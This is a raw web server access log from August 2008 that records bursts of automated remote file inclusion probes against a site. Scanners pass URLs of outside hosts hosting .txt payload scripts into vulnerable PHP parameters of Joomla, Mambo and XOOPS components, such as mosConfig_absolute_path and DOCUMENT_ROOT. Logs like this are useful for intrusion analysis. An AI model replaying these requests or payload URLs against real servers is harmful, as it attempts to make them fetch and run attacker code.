77.74.192.227 - - [31/Aug/2008:11:25:11 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://sylacaugaonline.info/joomla/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
77.74.192.227 - - [31/Aug/2008:11:25:12 -0700] "GET //index.php?DOCUMENT_ROOT=http://sylacaugaonline.info/joomla/idr.txt?? HTTP/1.1" 200 89547 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
77.74.192.227 - - [31/Aug/2008:11:25:13 -0700] "GET /logs/access_080723.log//index.php?DOCUMENT_ROOT=http://sylacaugaonline.info/joomla/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
77.74.192.227 - - [31/Aug/2008:11:25:13 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://sylacaugaonline.info/joomla/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
77.74.192.227 - - [31/Aug/2008:11:25:14 -0700] "GET //index.php?DOCUMENT_ROOT=http://sylacaugaonline.info/joomla/idr.txt?? HTTP/1.1" 200 89531 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
87.106.28.93 - - [31/Aug/2008:11:25:31 -0700] "GET /logs/?custompluginfile[]=http://www.andrewbostom.org/components/com_galerry1?? HTTP/1.1" 200 63000 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
87.106.28.93 - - [31/Aug/2008:11:25:32 -0700] "GET /?custompluginfile[]=http://www.andrewbostom.org/components/com_galerry1?? HTTP/1.1" 200 89576 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
72.29.68.220 - - [31/Aug/2008:11:26:14 -0700] "GET /logs/access_080820.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.alevichat.com/idN.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.68.220 - - [31/Aug/2008:11:26:42 -0700] "GET /logs/access_080820.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.alevichat.com/idN.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.25.180.198 - - [31/Aug/2008:11:26:48 -0700] "GET /senetman/html/index.php?page=http://www.fileden.com/files/2008/6/19/1967132/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.25.180.198 - - [31/Aug/2008:11:26:48 -0700] "GET /logs/senetman/html/index.php?page=http://www.fileden.com/files/2008/6/19/1967132/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.85.238.20 - - [31/Aug/2008:11:26:57 -0700] "GET /bikes/CreSTOC07/ HTTP/1.1" 200 15296 "-" "DoCoMo/1.0/N505i/c20/TB/W20H10 (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
72.29.68.220 - - [31/Aug/2008:11:26:58 -0700] "GET /logs/access_080621.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.alevichat.com/idN.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
81.177.22.242 - - [31/Aug/2008:11:27:02 -0700] "GET /logs/access_080723.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
81.177.22.242 - - [31/Aug/2008:11:27:03 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
81.177.22.242 - - [31/Aug/2008:11:27:03 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
87.106.68.149 - - [31/Aug/2008:11:27:20 -0700] "GET /logs/access_080608.log//modules/xfsection/modify.php?dir_module=http://xvascainox7.sites.uol.com.br/v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.29.68.220 - - [31/Aug/2008:11:27:26 -0700] "GET /logs/access_080621.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.alevichat.com/idN.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
81.169.169.235 - - [31/Aug/2008:11:27:28 -0700] "GET /logs/access_080809.log//bemarket/postscript/postscript.php?p_mode=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
72.29.68.220 - - [31/Aug/2008:11:27:42 -0700] "GET /logs/access_080723.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.alevichat.com/idN.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.68.220 - - [31/Aug/2008:11:27:42 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.alevichat.com/idN.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.68.220 - - [31/Aug/2008:11:27:43 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.alevichat.com/idN.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.68.220 - - [31/Aug/2008:11:27:46 -0700] "GET /logs/access_080723.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.alevichat.com/idN.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.68.220 - - [31/Aug/2008:11:27:46 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.alevichat.com/idN.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.68.220 - - [31/Aug/2008:11:27:46 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.alevichat.com/idN.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.160.189.11 - - [31/Aug/2008:11:28:03 -0700] "GET /logs/access_080705.log//config/dbutil.bck.php?confdir=http://www.unixserv.net/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.147.236.10 - - [31/Aug/2008:11:28:15 -0700] "GET /logs/access_080530.log//include/admin.lib.inc.php?site_path=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.147.236.10 - - [31/Aug/2008:11:28:17 -0700] "GET /logs/access_080531.log//include/admin.lib.inc.php?site_path=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
202.181.105.117 - - [31/Aug/2008:11:28:32 -0700] "GET /?INCLUDE_FOLDER=http://216.155.36.4/~prince/di???? HTTP/1.1" 200 89482 "-" "libwww-perl/5.65" "www.dmulk.com"
202.181.105.117 - - [31/Aug/2008:11:28:34 -0700] "GET /logs/?INCLUDE_FOLDER=http://216.155.36.4/~prince/di???? HTTP/1.1" 200 63000 "-" "libwww-perl/5.65" "www.dmulk.com"
66.135.39.118 - - [31/Aug/2008:11:28:38 -0700] "GET /logs/access_080221.log//modules/agendax/addevent.inc.php?agendax_path=http://jofchurch.org/calendar//tools/helpid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.135.39.118 - - [31/Aug/2008:11:28:39 -0700] "GET //modules/agendax/addevent.inc.php?agendax_path=http://jofchurch.org/calendar//tools/helpid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.135.39.118 - - [31/Aug/2008:11:28:39 -0700] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://jofchurch.org/calendar//tools/helpid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
87.106.28.93 - - [31/Aug/2008:11:28:46 -0700] "GET /logs/?custompluginfile[]=http://www.andrewbostom.org/components/com_galerry1?? HTTP/1.1" 200 63000 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
87.106.28.93 - - [31/Aug/2008:11:28:46 -0700] "GET /?custompluginfile[]=http://www.andrewbostom.org/components/com_galerry1?? HTTP/1.1" 200 89592 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
66.135.39.118 - - [31/Aug/2008:11:28:52 -0700] "GET /logs/access_080724.log//modules/agendax/addevent.inc.php?agendax_path=http://jofchurch.org/calendar//tools/helpid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.77.184.232 - - [31/Aug/2008:11:29:31 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.160.189.11 - - [31/Aug/2008:11:30:03 -0700] "GET /logs/access_080611.log//config/dbutil.bck.php?confdir=http://www.unixserv.net/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.25.180.198 - - [31/Aug/2008:11:30:05 -0700] "GET /logs/access_080628.log/xGB.php?act=admin&do=http://www.fileden.com/files/2008/6/19/1967132/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.25.180.198 - - [31/Aug/2008:11:30:08 -0700] "GET /logs/access_080125.log/xGB.php?act=admin&do=http://www.fileden.com/files/2008/6/19/1967132/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.25.180.198 - - [31/Aug/2008:11:30:15 -0700] "GET /xGB.php?act=admin&do=http://www.fileden.com/files/2008/6/19/1967132/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.127.70.16 - - [31/Aug/2008:11:30:53 -0700] "GET /logs/access_080211.log//admin.a6mambocredits.php?mosConfig_live_site=http://jofchurch.org/calendar//tools/helpid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
75.127.70.16 - - [31/Aug/2008:11:30:53 -0700] "GET //admin.a6mambocredits.php?mosConfig_live_site=http://jofchurch.org/calendar//tools/helpid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
75.127.70.16 - - [31/Aug/2008:11:30:54 -0700] "GET /logs//admin.a6mambocredits.php?mosConfig_live_site=http://jofchurch.org/calendar//tools/helpid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
88.84.157.43 - - [31/Aug/2008:11:30:55 -0700] "GET /logs/access_080211.log//admin.a6mambocredits.php?mosConfig_live_site=http://jofchurch.org/calendar//tools/helpid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.157.43 - - [31/Aug/2008:11:30:56 -0700] "GET //admin.a6mambocredits.php?mosConfig_live_site=http://jofchurch.org/calendar//tools/helpid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.157.43 - - [31/Aug/2008:11:30:57 -0700] "GET /logs/access_080211.log//admin.a6mambocredits.php?mosConfig_live_site=http://jofchurch.org/calendar//tools/helpid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.157.43 - - [31/Aug/2008:11:30:57 -0700] "GET /logs//admin.a6mambocredits.php?mosConfig_live_site=http://jofchurch.org/calendar//tools/helpid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.157.43 - - [31/Aug/2008:11:30:59 -0700] "GET //admin.a6mambocredits.php?mosConfig_live_site=http://jofchurch.org/calendar//tools/helpid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.157.43 - - [31/Aug/2008:11:30:59 -0700] "GET /logs//admin.a6mambocredits.php?mosConfig_live_site=http://jofchurch.org/calendar//tools/helpid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.68.149 - - [31/Aug/2008:11:31:16 -0700] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://xvascainox7.sites.uol.com.br/v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.68.149 - - [31/Aug/2008:11:31:16 -0700] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://xvascainox7.sites.uol.com.br/v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.48.67.39 - - [31/Aug/2008:11:31:18 -0700] "GET /logs/access_080108.log//index.php?view=page&pagename=http://www.forum.dietologam.ru/Themes/oye.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.48.67.39 - - [31/Aug/2008:11:31:19 -0700] "GET /logs/access_080728.log//index.php?view=page&pagename=http://www.forum.dietologam.ru/Themes/oye.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
220.73.137.93 - - [31/Aug/2008:11:31:44 -0700] "GET /logs/access_080709.log/index.php?option=com_search&Itemid=&mosConfig_absolute_path=http://artemcity.ru/r0x.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
220.73.137.93 - - [31/Aug/2008:11:31:44 -0700] "GET /logs/access_080709.log/index.php?option=com_search&Itemid=&mosConfig_absolute_path=http://artemcity.ru/r0x.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
220.73.137.93 - - [31/Aug/2008:11:31:45 -0700] "GET /index.php?option=com_search&Itemid=&mosConfig_absolute_path=http://artemcity.ru/r0x.txt?? HTTP/1.1" 200 89656 "-" "libwww-perl/5.79" "www.dmulk.com"
220.73.137.93 - - [31/Aug/2008:11:31:45 -0700] "GET /index.php?option=com_search&Itemid=&mosConfig_absolute_path=http://artemcity.ru/r0x.txt?? HTTP/1.1" 200 89672 "-" "libwww-perl/5.79" "www.dmulk.com"
220.73.137.93 - - [31/Aug/2008:11:31:47 -0700] "GET /logs/index.php?option=com_search&Itemid=&mosConfig_absolute_path=http://artemcity.ru/r0x.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
220.73.137.93 - - [31/Aug/2008:11:31:47 -0700] "GET /logs/index.php?option=com_search&Itemid=&mosConfig_absolute_path=http://artemcity.ru/r0x.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.238.195.13 - - [31/Aug/2008:11:31:56 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://http://dewa.yourfreehosting.net/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
75.127.70.16 - - [31/Aug/2008:11:32:02 -0700] "GET /logs/access_080602.log//admin.a6mambocredits.php?mosConfig_live_site=http://jofchurch.org/calendar//tools/helpid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
88.84.157.43 - - [31/Aug/2008:11:32:16 -0700] "GET /logs/access_080602.log//admin.a6mambocredits.php?mosConfig_live_site=http://jofchurch.org/calendar//tools/helpid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.9.248.162 - - [31/Aug/2008:11:32:21 -0700] "GET /logs/access_080312.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.9.248.162 - - [31/Aug/2008:11:32:21 -0700] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.9.248.162 - - [31/Aug/2008:11:32:22 -0700] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.9.248.162 - - [31/Aug/2008:11:32:22 -0700] "GET /logs/access_080726.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
88.84.157.43 - - [31/Aug/2008:11:32:26 -0700] "GET /logs/access_080602.log//admin.a6mambocredits.php?mosConfig_live_site=http://jofchurch.org/calendar//tools/helpid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.238.195.13 - - [31/Aug/2008:11:32:28 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://zuppl.de/documents/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.238.195.13 - - [31/Aug/2008:11:32:29 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://zuppl.de/documents/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.9.248.162 - - [31/Aug/2008:11:32:29 -0700] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
87.106.68.149 - - [31/Aug/2008:11:32:29 -0700] "GET /logs/access_080131.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://xvascainox7.sites.uol.com.br/v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.68.149 - - [31/Aug/2008:11:32:30 -0700] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://xvascainox7.sites.uol.com.br/v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.68.149 - - [31/Aug/2008:11:32:30 -0700] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://xvascainox7.sites.uol.com.br/v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.68.149 - - [31/Aug/2008:11:32:34 -0700] "GET /logs/access_071202.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://xvascainox7.sites.uol.com.br/v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.77.184.232 - - [31/Aug/2008:11:32:38 -0700] "GET /logs/access_080408.log/modules/agendax/addevent.inc.php?agendax_path=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.77.184.232 - - [31/Aug/2008:11:32:38 -0700] "GET /modules/agendax/addevent.inc.php?agendax_path=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.77.184.232 - - [31/Aug/2008:11:32:39 -0700] "GET /logs/modules/agendax/addevent.inc.php?agendax_path=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.238.195.13 - - [31/Aug/2008:11:32:47 -0700] "GET /logs/access_080808.log//popup_window.php?site_isp_root=http://http://dewa.yourfreehosting.net/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.9.248.162 - - [31/Aug/2008:11:32:47 -0700] "GET /logs/access_080427.log/index.php?body=http://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
201.238.195.13 - - [31/Aug/2008:11:32:47 -0700] "GET /logs//popup_window.php?site_isp_root=http://http://dewa.yourfreehosting.net/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.77.184.232 - - [31/Aug/2008:11:32:48 -0700] "GET /logs/access_080126.log/modules/My_eGallery/public/displayCategory.php?basepath=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.9.248.162 - - [31/Aug/2008:11:32:48 -0700] "GET /index.php?body=http://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 200 89516 "-" "libwww-perl/5.810" "www.dmulk.com"
67.77.184.232 - - [31/Aug/2008:11:32:48 -0700] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.77.184.232 - - [31/Aug/2008:11:32:49 -0700] "GET /logs/modules/My_eGallery/public/displayCategory.php?basepath=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.77.184.232 - - [31/Aug/2008:11:32:57 -0700] "GET /logs/access_080110.log/modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.77.184.232 - - [31/Aug/2008:11:32:57 -0700] "GET /logs/access_080225.log/modules/My_eGallery/public/displayCategory.php?basepath=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.77.184.232 - - [31/Aug/2008:11:32:58 -0700] "GET /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.77.184.232 - - [31/Aug/2008:11:32:58 -0700] "GET /logs/modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.77.184.232 - - [31/Aug/2008:11:33:00 -0700] "GET /logs/access_080411.log/modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.77.184.232 - - [31/Aug/2008:11:33:01 -0700] "GET /logs/access_080410.log/modules/agendax/addevent.inc.php?agendax_path=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.210.139.66 - - [31/Aug/2008:11:33:03 -0700] "GET /logs/access_080211.log//admin.a6mambocredits.php?mosConfig_live_site=http://septimamaipu.cl/septima/mambots/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
62.210.139.66 - - [31/Aug/2008:11:33:03 -0700] "GET //admin.a6mambocredits.php?mosConfig_live_site=http://septimamaipu.cl/septima/mambots/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
62.210.139.66 - - [31/Aug/2008:11:33:04 -0700] "GET /logs//admin.a6mambocredits.php?mosConfig_live_site=http://septimamaipu.cl/septima/mambots/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
121.124.127.40 - - [31/Aug/2008:11:33:05 -0700] "GET /logs/access_080312.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
121.124.127.40 - - [31/Aug/2008:11:33:05 -0700] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
121.124.127.40 - - [31/Aug/2008:11:33:06 -0700] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
121.124.127.40 - - [31/Aug/2008:11:33:06 -0700] "GET /logs/access_080726.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.17.6.7 - - [31/Aug/2008:11:33:07 -0700] "GET /logs/access_080211.log//admin.a6mambocredits.php?mosConfig_live_site=http://septimamaipu.cl/septima/mambots/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
85.17.6.7 - - [31/Aug/2008:11:33:07 -0700] "GET //admin.a6mambocredits.php?mosConfig_live_site=http://septimamaipu.cl/septima/mambots/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
85.17.6.7 - - [31/Aug/2008:11:33:07 -0700] "GET /logs//admin.a6mambocredits.php?mosConfig_live_site=http://septimamaipu.cl/septima/mambots/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
67.77.184.232 - - [31/Aug/2008:11:33:21 -0700] "GET /logs/access_080118.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.77.184.232 - - [31/Aug/2008:11:33:21 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.77.184.232 - - [31/Aug/2008:11:33:21 -0700] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.135.39.118 - - [31/Aug/2008:11:33:27 -0700] "GET //admin.a6mambocredits.php?mosConfig_live_site=http://septimamaipu.cl/septima/mambots/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
66.135.39.118 - - [31/Aug/2008:11:33:27 -0700] "GET /logs//admin.a6mambocredits.php?mosConfig_live_site=http://septimamaipu.cl/septima/mambots/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
66.135.39.118 - - [31/Aug/2008:11:33:29 -0700] "GET /logs/access_080211.log//admin.a6mambocredits.php?mosConfig_live_site=http://septimamaipu.cl/septima/mambots/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
66.135.39.118 - - [31/Aug/2008:11:33:29 -0700] "GET /logs/access_080211.log//admin.a6mambocredits.php?mosConfig_live_site=http://septimamaipu.cl/septima/mambots/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
66.135.39.118 - - [31/Aug/2008:11:33:29 -0700] "GET //admin.a6mambocredits.php?mosConfig_live_site=http://septimamaipu.cl/septima/mambots/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
66.135.39.118 - - [31/Aug/2008:11:33:29 -0700] "GET /logs//admin.a6mambocredits.php?mosConfig_live_site=http://septimamaipu.cl/septima/mambots/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
121.124.127.40 - - [31/Aug/2008:11:33:31 -0700] "GET /logs/access_080427.log/index.php?body=http://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
